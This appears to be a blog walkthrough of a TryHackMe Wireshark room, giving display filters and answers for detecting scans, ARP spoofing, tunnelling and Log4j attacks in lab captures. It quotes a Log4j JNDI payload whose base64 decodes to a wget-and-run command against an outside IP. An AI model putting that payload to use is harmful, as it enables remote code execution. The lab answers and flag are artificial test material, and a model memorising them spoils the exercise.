Learn the basics of traffic analysis with Wireshark and how to find anomalies on your network!
Link: https://tryhackme.com/room/wiresharkpacketoperations
“In this room, we will cover the techniques and key points of traffic analysis with Wireshark and detect suspicious activities. Note that this is the third and last room of the Wireshark room trio, and it is suggested to visit the first two rooms stated below to practice and refresh your Wireshark skills before starting this one.”
“In the first two rooms, we have covered how to use Wireshark and do packet-level searches. Now, it is time to investigate and correlate the packet-level information to see the big picture in the network traffic, like detecting anomalies and malicious activities. For a security analyst, it is vital to stop and understand pieces of information spread in packets by applying the analyst’s knowledge and tool functionality. This room will cover investigating packet-level details by synthesising the analyst knowledge and Wireshark functionality for detecting anomalies and odd situations for a given case.”
Task 2: Nmap Scans
Use the “Desktop/exercise-pcaps/nmap/Exercise.pcapng” file.
What is the total number of the “TCP Connect” scans?
Ans: 1000
tcp.flags.syn == 1 and tcp.flags.ack == 0 and tcp.window_size > 1024
Which scan type is used to scan the TCP port 80?
Ans: TCP Connect
tcp.port == 80
How many “UDP close port” messages are there?
Ans: 1083
icmp.type == 3 and icmp.code == 3
“icmp.type == 3”: This filter matches ICMP packets based on the ICMP type field. ICMP type 3 represents the Destination Unreachable message.
“icmp.code == 3”: This filter matches ICMP packets based on the ICMP code field. ICMP code 3 is a specific code value within the Destination Unreachable message type.
Which UDP port in the 55–70 port range is open?
Ans: 68
udp.dstport >= 50 and udp.port <= 70
After filtering out destination ports between 50 and 70, there are fourt ports identified that use udp. But if we analyze the packet details of each icmp packets with a“Destination unreachable”, we will identify that ports 67, 53, and 69 are not open.
Fore example in the second image, the first ICMP error uses the original request from 10.10.60.7:67. The same would be said of the other ICMP errors.
Task 3: ARP Poisoning & Man In The Middle!
Use the “Desktop/exercise-pcaps/arp/Exercise.pcapng” file.
What is the number of ARP requests crafted by the attacker?
Ans: 284
We first need to identify who the attacker is.arp.duplicate-address-detected or arp.duplicate-address-frame
We have identified that the attacker has a mac address of “00:0c:29:e2:18:b4″
Let’s now craft a query to filter all ARP requests from the MAC address of the attacker.
arp.opcode == 1 and arp.src.hw_mac == 00:0c:29:e2:18:b4
What is the number of HTTP packets received by the attacker?
Ans: 90
We will modify the query to filter all http packets received by the attacker.
http and eth.addr == 00:0c:29:e2:18:b4
If we use the IP address of the attacker, no packets will be displayed. However, if we use the spoofed address, we will see some packets.
What is the number of sniffed username&password entries?
Ans: 6
We first need to identify the login points or URL for authentication.
http and eth.addr == 00:0c:29:e2:18:b4We see that the attacker sent a “GET” request to a login page. In the packet details under HTTP, we see the host name hosting the login page. We will apply that as filter.
We will modify the query to filter only “POST” request. We get ten packets.
Go through all the packets, and some will contain credentials in the Packet details under the HTML Form URL endoded section. Below is an example.
I realized soon after I answered the last two questions below that we can modify the filter used to matched any value in that field, excluding empty strings.
urlencoded-form matches ".+"
What is the password of the “Client986”?
Ans: clientnothere!
From the previous packet, we know that data was captured in the HTML Form URL Encoded section. The Display Filter Expression will help us create a filter that is acceptable to wireshark.
urlencoded-form matches "client986"
What is the comment provided by the “Client354”?
Ans: Nice work!
Same concept as the previous question. Any comments in the hostname might have been captured.
urlencoded-form matches "client354"
Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap” file.
What is the MAC address of the host “Galaxy A30”?
Ans: 9a:81:41:cb:96:6c
dhcp.option.hostname contains "A30"
How many NetBIOS registration requests does the “LIVALJM” workstation have?
Ans: 16
Let’s create a query using the Display Filter Expression. The first one is building an NBNS registration request filter, and the second one is filtering NBNS names that match only the workstation “LIVALJM”
Which host requested the IP address “172.16.13.85”?
Ans: Galaxy-A12
dhcp.option.dhcp == 3 && dhcp.option.requested_ip_address == 172.16.13.85
If the Host Name column is not diplayed as a column, go to the Packet List and right-click to add column for the host name. Otherwise, search for the host name within the DHCP Packet details pane.
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap” file.
What is the IP address of the user “u5”? (Enter the address in defanged format.)
Ans: 10[.]1[.]12[.]2
kerberos.CNameString contains "u5"
Defang the IP address using cyberchef.
What is the hostname of the available host in the Kerberos packets?
Ans: xp1$
kerberos.CNameString contains "$"
Values that end with “$” are host names, and the ones without it are usernames.
Task 5: Tunneling Traffic: DNS and ICMP
Use the “Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap” file.
Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
Ans: SSHdata.len > 64 and icmp
The result does not have enough data for us to analyze.
So we will modify the query to include the protocols commonly used for data exfiltration such as SSH, FTP, TCP, and HTTP.
(data.len > 64) and (icmp contains "ssh" or icmp contains "ftp" or icmp contains "tcp" or icmp contains "http")
We got three results. Inspect one of the packets and focus on the packet bytes pane.
The strings on the right-side are commonly associated with SSH protocol negotiation, encryption algorithms, and authentication methods.
Use the “Desktop/exercise-pcaps/dns-icmp/dns.pcap” file.
Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)
Ans: dataexfil[.]com
dns.qry.name.len > 15 and !mdns
We got over 30,000 packets. Imagine going over each one individually
I modified the query and increased the query name length to 40 to look for DNS names with particularly long lengths, which is highly suspicious for a normal DNS name.
dns.qry.name.len > 40 and !mdns
We can also use the following query or modify it if we are looking for a specific top-level domain such as “.com”
dns.qry.name.len > 40 and !mdns && dns.qry.name contains ".com"Task 6: Cleartext Protocol Analysis: FTP
Use the “Desktop/exercise-pcaps/ftp/ftp.pcap” file.
How many incorrect login attempts are there?
Ans: 737
ftp.response.code == 530
What is the size of the file accessed by the “ftp” account?
Ans: 39424
ftp.response.code == 213
The ftp.response.code of 213 provides information about the status or size of a downloaded file. The “arg” value contains the readable strings that include file size in bytes.
The adversary uploaded a document to the FTP server. What is the filename?
Ans: resume.doc
ftp.request.command == "RETR"
The FTP command “RETR” is used to retrieve (or download) files or documents from the FTP server to our local system.
Not sure if the question meant to ask about uploading documents to the FTP server because the ftp command for that is “STOR” and the uploaded file was different.
The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?
Ans: CHMOD 777
ftp contains "CHMOD"
“CHMOD” is a terminal command used for modifying file permissions using numeric or symbolic representation.
Task 7: Cleartext Protocol Analysis: HTTP
Use the “Desktop/exercise-pcaps/http/user-agent.cap” file.
Investigate the user agents. What is the number of anomalous “user-agent” types?
Ans: 6
http.user_agent
Filter packets with HTTP user-agent. Select one of the packets and apply the “User-Agent” info as a column. We have to go through each of the “User-Agent” columns and idenify the legitimate and elligitimate ones.
The hint actually gave us the first user-agent.
- Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
- Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
- Wfuzz/2.4
- sqlmap/1.4#stable (http://sqlmap.org)
- ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
What is the packet number with a subtle spelling difference in the user agent field?
Ans: 52
This is a needle in a hay stack because at first glance, nothing seems suspicious.
Use the “Desktop/exercise-pcaps/http/http.pcapng” file.
Locate the “Log4j” attack starting phase. What is the packet number?
Ans: 444
With this task, we will be able to answer the last two questions.
(http.user_agent contains "$") or (http.user_agent contains "==")
Copy the value of the User-Agent then decode it from base 64 using cyberchef.
This is the attack starting phase as seen from the decoded command. The command “wget” would retreive the bash script “lh.sh” from the hosting address, then change the file’s permission to executable, then eventually executing the malicious file.
Locate the “Log4j” attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude “{}”.)
Ans: 62[.]210[.]130[.]250
Task 8: Encrypted Protocol Analysis: Decrypting HTTPS
Use the “Desktop/exercise-pcaps/https/Exercise.pcap” file.
What is the frame number of the “Client Hello” message sent to “accounts.google.com”?
Ans: 16
(http.request or tls.handshake.type == 1) and !(ssdp)
“tls.handshake.type == 1” filters TLS requests sent by a client to a server.
Decrypt the traffic with the “KeysLogFile.txt” file. What is the number of HTTP2 packets?
Ans: 115
Adding the key log file: “Edit → Preferences → Protocols → TLS” menu. Then filter only http2 packets.
Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
Ans: safebrowsing[.]googleapis[.]com
Press ctrl+g and go to packet 322.
In the packet details pane, we see the header authority. Defang the address in cyberchef.
Investigate the decrypted packets and find the flag! What is the flag?
Ans: FLAG{THM-PACKETMASTER}
In the export HTTP object list window, there are two files, and one of which is kind of suspicious. So let’s go to the packet number and see what it is.
The flag can be seen in the Line-based text data section of the packet details pane.
Task 9 Bonus: Hunt Cleartext Credentials!
Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
What is the packet number of the credentials using “HTTP Basic Auth”?
Ans: 237
What is the packet number where “empty password” was submitted?
Ans: 170
If we click on the packet number in the credentials window, wireshark directs us to the packet as seen from the image above.
Browse through the packets. Packet 170 has no value in the Request arg.
Another way to look for empty credentials submission for FTP packets is to select one of the packets where authentication is being requested. Select the “Request command: PASS” from the packet details, then left-click it and drag all the way to the display filter, or simply by right-clicking and applying it as a display filter.
The result will display all ftp packets that requested for a “PASS” command in the authentication.
Task 10 Bonus: Actionable Results!
Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
Create firewall rules by using “Tools → Firewall ACL Rules”
Select packet number 99. Create a rule for “IPFirewall (ipfw)”. What is the rule for “denying source IPv4 address”?
Change the rules for “IPFirewall(ipfw)”
Ans: add deny ip from 10.121.70.151 to any in
Select packet number 231. Create “IPFirewall” rules. What is the rule for “allowing destination MAC address”?
Ans: add allow MAC 00:d0:59:aa:af:80 any in
Deselect Deny.
Igor_sec's Blog 